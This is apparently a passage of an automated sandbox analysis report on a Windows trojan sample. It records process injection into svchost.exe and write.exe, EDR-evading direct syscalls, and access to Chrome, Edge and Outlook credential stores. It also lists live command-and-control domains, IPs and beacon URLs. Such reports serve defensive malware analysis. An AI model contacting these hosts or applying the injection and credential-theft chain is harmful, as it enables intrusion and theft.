            Source: C:\Users\user\Desktop\Z6s208B9QX.exe Code function: 0_2_0041A208 IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe Code function: 0_2_00417DAA IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtQueryVolumeInformationFile: Direct from: 0x76F12F2C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtQuerySystemInformation: Direct from: 0x76F148CC
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtAllocateVirtualMemory: Direct from: 0x76F148EC
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtQueryAttributesFile: Direct from: 0x76F12E6C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtReadVirtualMemory: Direct from: 0x76F12E8C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtCreateKey: Direct from: 0x76F12C6C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtSetInformationThread: Direct from: 0x76F12B4C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtClose: Direct from: 0x76F12B6C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtAllocateVirtualMemory: Direct from: 0x76F13C9C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtWriteVirtualMemory: Direct from: 0x76F1490C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtCreateUserProcess: Direct from: 0x76F1371C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtTerminateThread: Direct from: 0x76F12FCC
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtCreateFile: Direct from: 0x76F12FEC
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtOpenFile: Direct from: 0x76F12DCC
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtQueryInformationToken: Direct from: 0x76F12CAC
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtAllocateVirtualMemory: Direct from: 0x76F12BEC
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtDeviceIoControlFile: Direct from: 0x76F12AEC
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtSetInformationThread: Direct from: 0x76F063F9
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtOpenSection: Direct from: 0x76F12E0C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtMapViewOfSection: Direct from: 0x76F12D1C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtResumeThread: Direct from: 0x76F136AC
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtCreateMutant: Direct from: 0x76F135CC
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtWriteVirtualMemory: Direct from: 0x76F12E3C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtNotifyChangeKey: Direct from: 0x76F13C2C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtProtectVirtualMemory: Direct from: 0x76F07B2E
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtProtectVirtualMemory: Direct from: 0x76F12F9C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtSetInformationProcess: Direct from: 0x76F12C5C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtOpenKeyEx: Direct from: 0x76F12B9C
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtQueryInformationProcess: Direct from: 0x76F12C26
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtResumeThread: Direct from: 0x76F12FBC
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtDelayExecution: Direct from: 0x76F12DDC
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtReadFile: Direct from: 0x76F12ADC
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe NtQuerySystemInformation: Direct from: 0x76F12DFC
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeNtAllocateVirtualMemory: Direct from: 0x76F12BFCJump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\write.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\write.exeThread register set: target process: 2692Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeThread APC queued: target process: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeJump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2C40008Jump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00436CD7 LogonUserW,0_2_00436CD7
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,0_2_0040D590
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00434418
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event,0_2_0043333C
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Z6s208B9QX.exe"Jump to behavior
            Source: C:\Program Files (x86)\PZHeSQlLTMgDWGgAeGkqhKIlzUAaLXeGcDNeBEjXxOvHEQaaccEFsXfl\UCAmCgWJyh.exeProcess created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\write.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00446124
            Source: Z6s208B9QX.exe, UCAmCgWJyh.exe, 0000000A.00000000.1650784396.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000A.00000002.3744648444.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746140501.0000000001140000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: UCAmCgWJyh.exe, 0000000A.00000000.1650784396.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000A.00000002.3744648444.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746140501.0000000001140000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: UCAmCgWJyh.exe, 0000000A.00000000.1650784396.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000A.00000002.3744648444.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746140501.0000000001140000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: Z6s208B9QX.exeBinary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
            Source: UCAmCgWJyh.exe, 0000000A.00000000.1650784396.00000000018B1000.00000002.00000001.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000A.00000002.3744648444.00000000018B0000.00000002.00000001.00040000.00000000.sdmp, UCAmCgWJyh.exe, 0000000D.00000002.3746140501.0000000001140000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: yProgram Manager
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_0041E364
            Source: C:\Users\user\Desktop\Z6s208B9QX.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500

            Stealing of Sensitive Information

            Source: Yara match | File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3743731307.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3742814788.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1730979134.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3746307677.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\write.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\write.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: Z6s208B9QX.exe | Binary or memory string: WIN_XP
            Source: Z6s208B9QX.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----&
            Source: Z6s208B9QX.exe | Binary or memory string: WIN_XPe
            Source: Z6s208B9QX.exe | Binary or memory string: WIN_VISTA
            Source: Z6s208B9QX.exe | Binary or memory string: WIN_7
            Source: Z6s208B9QX.exe | Binary or memory string: WIN_8

            Remote Access Functionality

            Source: Yara match | File source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 0000000B.00000002.3738831581.0000000000530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1730607904.0000000003690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1730238566.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3743731307.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000B.00000002.3742814788.0000000002A00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.1730979134.0000000003B50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 0000000A.00000002.3746307677.0000000002FC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_004652BE socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_004652BE
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_00476619 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00476619
            Source: C:\Users\user\Desktop\Z6s208B9QX.exe | Code function: 0_2_0046CEF3 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject,0_2_0046CEF3
            MITRE ATT&CK Matrix (one column per tactic; a number before a technique name is carried over from the report as shown there)

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 3 Obfuscated Files or Information | NTDS | 16 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 141 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Behavior Graph ID: 1529061; Sample: Z6s208B9QX.exe; Startdate: 08/10/2024; Architecture: WINDOWS; Score: 100

            Start node (2):
            - DNS/IP: www.suarahati20.xyz; www.broomeorchard.xyz; 21 other IPs or domains
            - Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 3 other signatures
            - Signature on www.broomeorchard.xyz (30): Performs DNS queries to domains with low reputation
            - Started: Z6s208B9QX.exe 1 (10)

            Z6s208B9QX.exe (10):
            - Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
            - Started: svchost.exe (13)

            svchost.exe (13):
            - Signatures: Maps a DLL or memory area into another process
            - Injected: UCAmCgWJyh.exe (16)

            UCAmCgWJyh.exe (16):
            - Signatures: Found direct / indirect Syscall (likely to bypass EDR)
            - Started: write.exe 13 (19)

            write.exe (19):
            - Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
            - Injected: UCAmCgWJyh.exe (22)
            - Started: firefox.exe (26)

            UCAmCgWJyh.exe (22):
            - DNS/IP: www.broomeorchard.xyz 15.197.204.56, ports 50014, 50015, 50016, TANDEMUS United States; www.93187.xyz 107.163.130.249, ports 49998, 49999, 50000, TAKE2US United States; 8 other IPs or domains
            - Signatures: Found direct / indirect Syscall (likely to bypass EDR)

            Source | Detection | Scanner | Label | Link
            Z6s208B9QX.exe | 71% | ReversingLabs | Win32.Trojan.Autoitinject |
            Z6s208B9QX.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
            https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
            NameIPActiveMaliciousAntivirus DetectionReputation
            tempatmudisini01.click
            103.21.221.4
            truetrue
              unknown
              www.nmh6.site
              43.154.104.247
              truetrue
                unknown
                www.zenscape.top
                199.192.21.169
                truetrue
                  unknown
                  www.broomeorchard.xyz
                  15.197.204.56
                  truetrue
                    unknown
                    o731lh.vip
                    3.33.130.190
                    truetrue
                      unknown
                      asociacia.online
                      81.2.196.19
                      truetrue
                        unknown
                        hse6978h2.g.asiagoogleantiddoscdn.com
                        23.224.37.76
                        truetrue
                          unknown
                          whats-in-the-box.org
                          3.33.130.190
                          truetrue
                            unknown
                            suarahati20.xyz
                            198.252.106.191
                            truetrue
                              unknown
                              www.93187.xyz
                              107.163.130.249
                              truetrue
                                unknown
                                xzwp.g.zxy-cname.com
                                20.184.53.162
                                truetrue
                                  unknown
                                  consultarfacil.online
                                  3.33.130.190
                                  truetrue
                                    unknown
                                    www.suarahati20.xyz
                                    unknown
                                    unknowntrue
                                      unknown
                                      www.consultarfacil.online
                                      unknown
                                      unknowntrue
                                        unknown
                                        www.o731lh.vip
                                        unknown
                                        unknowntrue
                                          unknown
                                          www.whats-in-the-box.org
                                          unknown
                                          unknowntrue
                                            unknown
                                            www.insicilia.today
                                            unknown
                                            unknowntrue
                                              unknown
                                              www.asociacia.online
                                              unknown
                                              unknowntrue
                                                unknown
                                                www.52ywq.vip
                                                unknown
                                                unknowntrue
                                                  unknown
                                                  www.tempatmudisini01.click
                                                  unknown
                                                  unknowntrue
                                                    unknown
                                                    www.1183377.app
                                                    unknown
                                                    unknowntrue
                                                      unknown
                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.tempatmudisini01.click/abla/true
                                                        unknown
                                                        http://www.zenscape.top/d8cw/?gP=ygF20N1+ik7kBOtBXXgSSDl+0mvoPS6R8XEst5j0lvkfFXMCnxh1w4hdkVa8euGiR7K2W9wNoXO2NDH8py5otm2v66eMoudDkD1QDiauZF6PALhNXvt3BHI=&-L=kBMxZFRpAD6Ptrue
                                                          unknown
                                                          http://www.93187.xyz/jyeu/?gP=KiLVsdjbhLGFnrJehKTzSS0IkzcAWv/LJ+iUpFrqUMB7t1Dgy4rxQKgK0ZJ2vypsgoxK5tfcGeo5lfiWWTY3/QPGqQrPglnah1puMp4IzQunG6SYXgyDdEY=&-L=kBMxZFRpAD6Ptrue
                                                            unknown
                                                            http://www.nmh6.site/8qne/true
                                                              unknown
                                                              http://www.consultarfacil.online/2ho9/?gP=sZDoihg8ajsFNu4sFB4wVMG24nWUkQUSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3H5WrA65sHfIkn+XzJEmDgF1B4fp1cD4x67M=&-L=kBMxZFRpAD6Ptrue
                                                                unknown
